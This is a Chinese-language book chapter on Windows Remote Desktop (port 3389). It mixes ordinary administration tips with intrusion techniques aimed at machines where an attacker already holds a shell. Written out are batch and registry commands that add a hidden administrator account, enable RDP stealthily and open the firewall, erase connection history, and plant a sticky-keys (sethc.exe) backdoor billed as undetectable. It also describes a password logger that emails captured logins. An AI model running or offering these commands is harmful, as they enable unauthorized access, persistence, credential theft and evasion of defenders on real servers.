1.16 远程终端的安装与使用

Windows XP/2000/2003 Server中的Windows Terminal Services（WTS）又称为远程终端服务（Remote Terminal Services）或者俗称为3389，是在Windows NT中最先使用的一种终端，在Windows 2000 Professional版本中不可以安装，在 Windows 2000 Server或以上版本才可以安装这个服务，其默认服务端口为3389，在Windows XP系统中称为“远程桌面（Remote Desktop）”。远程终端服务是Windows 2000 Server中的一项重要服务，主要通过远程桌面连接来对服务器进行管理或者运行应用程序，其功能类似于远程管理软件，由于远程终端服务使用简单、方便，不产生交互式登录，而且可以在后台操作，因此在各行各业都有大量的应用，深受用户喜爱。

远程终端服务在很多大型系统中使用得越来越广泛，正是由于远程终端服务在Windows Server 2000以及Windows 2003 Server中开启非常简单方便，一般情况都不需要重新安装，只需要运行几行DOS命令即可开启，且由于使用终端不受IP地址的限制，只要拥有用户账号及其对应的用户口令，就可以正常登录，因此对Windows XP/2000/2003 Server来讲远程使用终端服务即开启了方便之门，也开启了网络安全的安全隐患之门，而且目前还有针对Windows XP/2000/2003 Server及其以上版本的远程终端服务攻击的软件，一旦攻击成功，对于运行重要程序的服务器将会带来不可估量的经济损失，下面对远程终端服务以及相关安全技术进行分析。

1.16.1 Windows 2000 Server开启远程终端

在Windows 2000 Server中，有许多开启远程终端服务方法，归纳起来对于远程终端的开启主要通过以下步骤来进行。

（1）查看“Terminal Services”是否开启。可以通过服务器中的“服务管理”以及通过DOS命令下的“net start”来查看。如果在服务管理器中“Terminal Services”的状态为“启动”，则表示“Terminal Services”开启成功；而在DOS命令下使用“net start”的结果中如果出现了“Terminal Services”则表示开启了远程终端服务。

（2）启动Windows Terminal Services服务。

（3）使用“远程桌面连接”（RDP）连接远程终端，如果使用RDP连接远程终端成功，则表示远程终端服务开启成功。

1.16.2 Windows XP开启远程终端

Windows XP开启3389分为两种情况，一种就是管理员为了方便自己，另外一种就是入侵者在获取权限下非法开启3389，下面分为两种情况来介绍。管理员开启也就是图形界面开启，操作非常简单，按照下面的步骤即可完成。

1.Windows XP用户开启3389

单击“我的电脑”-“属性”-“远程”，如图1-124所示，选中“允许从这台计算机发送远程协助邀请”即可。

2.查看远程终端端口开放情况

单击“开始”-“运行”，在打开中输入“cmd”打开命令提示符，在其中输入“netstat-an | find "3389"”如果远程终端开启成功，那么就会显示默认的3389端口正在监听，如图1-125所示。

3.测试连接远程终端

单击“开始”-“运行”，在打开中输入“mstsc.exe”打开远程桌面连接客户端，在计算机中输入本机IP地址，接着会出现一个错误提示，如图1-126所示。不要紧张，在Windows XP中本机不能自己连接自己的3389，但在Windows 2003中就可以自己连接自己的IP地址。这时就可以换虚拟机进行连接，在虚拟机中输入本机的IP地址。

1.16.3 Windows 2003开启远程终端

1.允许开启远程终端

在Windows 2003中单击“我的电脑”-“属性”-“远程”，打开的界面如图1-130所示，在远程桌面中选中“允许用户远程连接到这台计算机”，允许开启远程终端。

2.授权远程桌面用户

单击“选择远程用户”，弹出如图1-131所示的用户选择界面，单击添加按钮选择一个远程桌面访问用户，在本例中选择的是asp.net用户。

3.查看远程终端端口

打开DOS命令提示符窗口，如图1-132所示，使用“netstat -an”或者“netstat -an | find"3389"”命令查看3389端口开启情况，如果在列表中显示3389端口已经开放，说明远程终端开启成功。

4.远程终端登录测试

单击“开始”-“运行”，在打开的DOS命令符窗口中输入“mstsc”命令，打开远程登录窗口，在其地址栏输入刚才开启远程终端的计算机的IP地址，单击连接，打开远程桌面登录窗口，输入用户名和密码，登录成功后如图1-133所示，表明远程终端开启成功。

1.16.4 一些常见开启远程终端服务的方法

1.使用rots.vbs脚本

Rots.vbs是由网名为“灰色轨迹zzzevazzz”写的一个VBS脚本，该脚本通过系统中自带的cscript.exe应用程序来执行，使用该脚本可以开启终端服务以及修改终端服务端口，其使用格式为：

cscript.exe rots.vbs ip user userpass port /r或cscript.exe rots.vbs ip user userpass port /fr

2.使用bat命令

通过记事本建立一个bat文件，在其中分别输入以下内容：

echo [Components] > c:\sql
echo TSEnable = on >>sql
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

运行该批处理命令后，重新启动计算机，则远程终端服务开启成功，该方法不能更改终端服务的端口。

3.导入一个reg文件到需要开启终端服务的机器中

该方法主要是修改远程终端服务的端口及其相关设置，通过生成一个以reg为后缀的文件，将该文件导入到需要开启终端服务的计算机上。该方法比较隐蔽，通过服务管理器以及“net start”命令均不会发现终端服务已经启动。Reg文件内容如下：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D

4.使用SQL注入软件启动3389服务

在Domain3.5以及网名为教主的HDSI2.0 SQL等注入工具中均提供了开启3389终端服务功能，使用该类软件来开启3389的前提条件是运行Web服务的服务器必须存在SQL注入漏洞，而且数据库用户的权限较大，在SQL Server 2000中数据库用户必须为sa。

5.使用其他软件开启3389

在网上其他一些流行软件其开启原理跟前面类似，只是使用不同的编程语言进行实现。

1.16.5 开启远程终端控制案例

本案例中的开启远程终端控制案例是在已经取得计算机的一个Shell的前提下，通过执行vbs脚本或者批处理命令来执行。在本案例中是在Windows 2000 Server中使用批处理命令开启远程终端。

（1）在Shell中执行2000.bat脚本，2000.bat脚本内容如图1-134所示，可以将该脚本文件复制或者上传到需要开启远程终端服务的计算机中，然后执行该脚本文件即可。

（2）重启计算机。在Windows 2000 Server中开启远程终端服务必须重启才能生效。

（3）使用远程终端连接器进行连接测试。重启Windows 2000 Server后，需要先查看被开启远程终端服务的计算机的远程终端是否开放。可以使用扫描软件或者sfind等小工具查看远程终端端口开放情况，例如输入命令“sfind -p 4455 192.168.1.100”来查看IP地址为192.168.1.100的计算机4455端口是否开放。如果开放则可以使用远程终端连接器进行连接。出现远程终端连接桌面后，输入用户名和密码即可进入远程终端桌面管理。

1.16.6 命令行开启远程终端

（1）实用注册表命令开启3389

直接打开命令提示符或者在telnet命令下直接将以下代码粘贴复制执行即可。

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

（2）来自国外黑客的开启3389命令

虽然见证了很多在WindowsXP和Windows2003下开启3389的命令，但下面这个命令是最为好用的，他不但添加了一个用户，同时将该用户添加到远程桌面用户组中，避免了权限限制情况下不能登录的问题，同时通过命令运行防火墙通过3389，实在是好命令。该命令在Windows2003下执行更佳，在Windows XP下添加用户后容易被用户发现。

net user antian365.com antian365 /add
net localgroup Administrators antian365.com /add
net localgroup "Remote Desktop Users" antian365.com /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\antian365.com" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "antian365.com" /t
REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess

1.16.7 3389实用技巧

1.实用技巧之一——修改默认端口

默认状态下远程桌面使用的端口一般为“3389”，如果不及时将这个端口号码更改掉的话，那么许多别有用心的黑客可能会利用这个端口，来远程控制和入侵本地工作站，以便窃取保存在本地工作站中的各类隐私信息。目前还有单独针对远程终端攻击的软件，如果你设置的密码碰巧在他的攻击字典中，那么很不幸地告诉你，你的计算机将被攻陷，因此在系统管理中修改默认端口就非常有必要了。修改默认端口3389为其他任意未使用的端口即可。下面介绍两种方法来修改端口。

（1）图形界面修改

首先以特权身份（管理员）登录进本地工作站或者服务器系统，用单击系统桌面中的“开始”-“运行”命令，从弹出的系统运行框中，输入字符串命令“regedit”，单击“确定”按钮后，打开本地工作站的系统注册表编辑界面；在该编辑界面的左侧显示区域，用鼠标展开HKEY_LOCAL_MACHINE注册表分支，从其后弹出的分支列表中依次选中SYSTEM\CurrentControlSetControl\Terminal Server\Wds\rdpwd\Tds\tcp子键，在tcp子键所对应的右侧显示区域中，我们会看到一个名为PortNumber的子键（如图1-136所示），这个子键其实就是用来定义远程桌面端口号码的，默认是以十六进制显示为“0X00000D3D”。双击该键值即可将该子键的数值设置成其他端口号码，如图1-137所示，在数字数据中可以任意输入一个未使用的端口，一般设置大端口号即可，例如可以将其数值设置成“8888”。

完成数值修改操作后，我们再将鼠标定位于注册表分支HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp，在RDP-Tcp子键所对应的右侧显示区域中，我们同样会看到一个名为PortNumber的子键，把该子键的数值也要一并加以修改，例如这里我们也要将它的数值修改成“8888”。到此3389的端口修改就完成了，此时使用远程终端的格式变更为“server port:8888”，例如IP地址为192.168.1.8的远程终端使用方法为“192.168.1.8:8888”，也即在远程终端连接的地址中输入“192.168.1.8:8888”进行连接。

（2）使用批处理修改终端端口

使用批处理修改默认端口需要事先计算出远程终端端口号的十六进制值，例如我们修改成“8888”其对应的端口十六进制值为“0X22B8”，使用下面命令即可完成端口的修改，将3389端口修改为8888端口。

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f

2.实用技巧之二——查询端口

查询端口的操作方式都差不多，主要通过查询注册表和下面介绍两种查询终端端口（适用于XP专业版、2000服务器版与2003操作系统）。

（1）通过查询注册表

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\ WinStations\RDP-Tcp /v PortNumber

查询结果如图1-138所示，在查询结果中显示的是“PortNumber REG_DWORD 0xd3d”，端口值为16进制编码，0xd3d表示端口号码为3389，可以将这个值复制到科学计算器中进行十六进制和十进制之间的换算即可（如图1-139所示）。0xd3d=13×16×16+3×16+13×1=3389。

还可以通过以下命令来显示3389的更多详细信息，显示结果如图1-140所示，regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\ Wds\rdpwd\Tds\tcp"

type tsp.reg

（2）通过VBS脚本命令来查询

使用VBS脚本命令来查询，一般也使用批处理来执行，在有些情况下，系统禁止执行vbs脚本（删除Windows Script Host 组件）。其代码如下，执行效果如图1-141所示。

Echo Dim ReadComputerName >>port.vbs
Echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>port.vbs
Echo Dim TSName,TSRegPath >>port.vbs
Echo TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\ WinStations\RDP-Tcp\PortNumber" >>port.vbs
Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs
Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs
Cscript port.vbs

上面所对应的VBS脚本为：

Dim ReadComputerName
Set ReadComputerName=WScript.CreateObject("WScript.Shell")
Dim TSName,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSName=ReadComputerName.RegRead(TSRegPath)
WScript.Echo("TermService port is:"&TSName)

将以上代码保存为ports.vbs，然后在命令提示符或者telnet窗口执行“Cscript port.vbs”即可。

3.实用技巧之三——控制终端用户的操作界面

根据我的经验，在众多的远程控制、远程管理软件中，微软的终端服务是速度最快的，不过终端服务也有一个很不人性化的地方，就是在默认情况下，我们是看不到终端用户的操作界面的，这在某些场合很不方便，比如你想在进行远程操作的同时也让对方能够看到你的操作界面，但终端服务下他是看不到的，其实，可以通过一些手段让对方看到远程操作的。

（1）A用户先登录远程终端服务器，然后进入进入命令行窗口。

（2）A用户获取当前运行的会话ID。运行“query session”命令，如图1-142所示，找出A会话的会话ID，这里是1，当前会话前有一个“>”标志，Console会话表示控制台。

（3）运行“shadow 会话ID号”，由于上面的A会话ID是1，所以要跟B他远程控制这里命令就是“shadow 2”，如图1-143所示，在A中会给出一段提示，冻结A用户当前的连接。记住不能自己跟自己shadow。

（4）此时B的终端服务界面会出现一个远程控制请求的对话框，如图1-144所示，如果B同意了请求，那么就可以远程控制和查看A的会话了，此时A仍能随意进行操作，如图1-145所示，A用户在远程终端的所有操作，都会在B用户的远程终端上面显示。如果要退出，则执行“Logoff”命令即可。

4.实用技巧之四——远程关闭终端服务器

如果要远程关掉终端服务器，可能大家通常都是直接使用开始菜单中的关机功能，但这种方式在关机时不会向终端用户发送消息，所以大家可以使用“tsshutdn”命令，比如我要在15秒内关掉终端服务器，就可以直接使用下面的命令：

Tsshutdn 15 /powerdown

要取消关机可以按CTRL+C组合键。

5.实用技巧之五——查看所有终端服务客户端运行的程序

有时服务器管理员可能想了解现在到底有多少用户在登录终端服务器，这些用户到底在运行些什么程序，这时可以使用Query系列命令，有 “query process”、“query session”、“query user”等，分别是查看进程、会话和用户的。另外要向客户端发送消息，可以使用msg命令。

6.实用技巧之六——重启计算机

在远程终端上面执行“iisreset /reboot /timeout:00”命令后系统会自动进行重启，这在入侵过程非常好用，在韩文，阿拉伯等看不懂文字的情况下执行该命令不会误操作将计算机关机。

7.实用技巧之七——灵活应用快捷键

熟练运用远程终端的快捷键，不但能够显示出高超的基本功，还能在实际应用过程发挥作用，比较时间就是金钱，在数秒时间就搞定一切，那是一种境界和修养，下面就是远程终端的一些快捷键。

CTRL+ALT+END调出“任务管理器”和打开“Windows锁定”对话框。

CTRL+ALT+BREAK这个就是切换全屏显示，在窗口和全屏显示之间切换客户端。

ALT+PAGE UP从左向右在程序之间切换。

ALT+PAGE DOWN从右向左在程序之间切换。

ALT+INSERT按启动顺序来回切换程序。

ALT+HOME显示“开始”菜单。

ALT+DELETE显示窗口的弹出式菜单。

CTRL+ALT+减号 (-) 将客户端活动窗口的快照放在“终端”服务器的剪贴板上（与在本地计算机上按下ALT+PrintScrn键时的功能相同）。

CTRL+ALT+加号 (+) 将整个客户端窗口区域的快照放在“终端”服务器的剪贴板上（与在本地计算机上按下PrintScrn键时的功能相同）。

8.实用技巧之八——限止指定用户可登录终端

为了保证服务器的安全没必要让服务器所有用户都允许登录，我们可以指定一个管理员账号可以登录。这就是限定某一个用户才能登录远程终端，通俗地讲就是将允许登录的用户加入到远程桌面登录用户组即可。具体操作方法为：

单击“管理工具”-“终端服务配置”-“连接”，再选择右边的“RDP-TCP”的属性，找到“权限”选项，删除administrators组，然后再添加我们允许的这个用户，其他一律不允许登录，如图1-146所示。这就是在很多情况下，即使你提权成功并且添加自己为管理员用户，也不能登录3389，即使密码输入正确。

9.实用技巧之九——我的3389我做主

“终端服务”默认没有日志记录，需要手动设置。远程终端启用日志审核后就能够了解我的3389，谁什么时候登录，什么时候注销的。具体开启方法如下：

单击“管理工具”-“终端服务配置”-“连接”，再选择右边的“RDP-TCP”的属性，找到“权限”选项，然后单击其下面的“高级”按钮，进入“RDP-TCP高级安全设置”，在“RDP-TCP高级安全设置”中单击“审核”，然后单击“添加”按钮，在选择用户和组中单击“高级”-“立即查找”，在搜索结果中找到“everyone”用户将其添加审核项目中，如图1-147所示，然后选择需要记录的事件。一般审核以下几个事件：

登录 成功 失败

连接 成功

注销 成功

断开 成功

10.实用技巧之十——记录登录3389的IP地址和时间

关于这个东东首先是在虚拟机上看到的，在一些大型虚拟机上面当一登录系统，会突然闪出一个DOS窗口，又突然消失了，后面通过分析，知道这个是管理员在记录谁登录过自己的操作系统。当时觉得很什么其实简单，具体操作步骤如下：

（1）创建记录3389登录时间的批处理文件和日志文件

3389.bat：用户登录时运行的脚本文件。

3389log.txt ：记录3389登录的IP地址和时间的txt文件。

3389.bat”批处理脚本文件内容如下：

date /t >>3389log.txt
time /t >>3389log.txt
netstat -n -p tcp | find ":3389">>3389log.txt
start Explorer

解释

第一行和第二行代码用于记录用户登录的时间。

第三行代码记录终端用户的IP地址，“netstat”是用来显示当前网络连接状况的命令，“-n”用于显示IP和端口，“-p tcp”显示TCP协议，管道符号“|”会将“netstat”命令的结果输出给“find”命令，再从输出结果中查找包含“3389”的行，然后把这个结果重定向到日志文件“3389log.txt”，最后一行为启动Explorer的命令。

（2）配置“终端服务器配置”

首先进入系统管理工具中的“终端服务器配置”，进入到默认RDP-Tcp属性中，然后切换到“环境”页下，启用“用户登录时启用下列程序”在程序路径和文件名处填写“c:\rdp\3389.bat”；并在起始于填写：“c:\rdp”，如图1-148所示。需要特别注意的是，这两个选项一定要正确，3389.bat文件位于C盘rdp文件夹下，而起始这是指3389.bat前面的路径，否则将出现3389登录错误，导致用户无法正常登录3389；一个好的解决方法是登录3389进行配置，但不退出，然后在本地另起一个3389登录，进行测试。网上还流传有其他类似的脚本，其原理大同小异，无外乎加载脚本的地方不一样。

11.实用技巧之十一——清除3389的登录记录

用一条系统自带的命令：

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client"/f

取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\ FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

12.实用技巧之十二——去掉限制登录

终端超出最大连接数时可用下面的命令来连接

mstsc /v:ip:3389 /console

13.实用技巧之十三——永不查杀的3389后门

永不查杀的3389后门其原理就是利用shift后门，连敲5次Shift键即可直接进入服务器。将以下代码复制到服务器上通过DOS命令提示符窗口执行即可。

@echo off
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo. & pause
Exit

14.实用技巧之十四——WinlogonHack记录3389登录密码

WinlogonHack的原理很简单就是记录管理员登录的密码，当有3389登上时，自动加载DLL，并且记录登录密码！保存为boot.dat文件。最新的一些版本已经可以将记录的密码发送到指定的邮箱，只要服务器连接网络，那么肉鸡就永远不会丢失。